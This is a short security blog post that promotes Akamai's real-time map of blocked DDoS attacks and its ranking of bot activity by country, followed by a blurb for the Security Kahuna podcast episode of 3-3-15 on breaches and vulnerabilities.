Among the security content on Akamai's new State of the Internet website is a very cool map where you can view DDoS attack activity worldwide in near real-time, including global sources, types, volume and targets. The most recent 5000 DDoS attacks blocked by Akamai appear on the map. Each DDoS attack source can command hundreds or thousands of DDoS bots. Viewers can customize their view by zooming in or out. There's also a section that ranks bot activity by country. Check it out here.



Security Kahuna Podcast, 3-3-15

Newly disclosed data breaches. A constant stream of fresh security vulnerabilities. Dangerous network configurations. Bad passwords. Old lessons unheeded. Bill Brenner, Dave Lewis and Martin McKeay discuss the latest incidents in the never-ending fight against evil.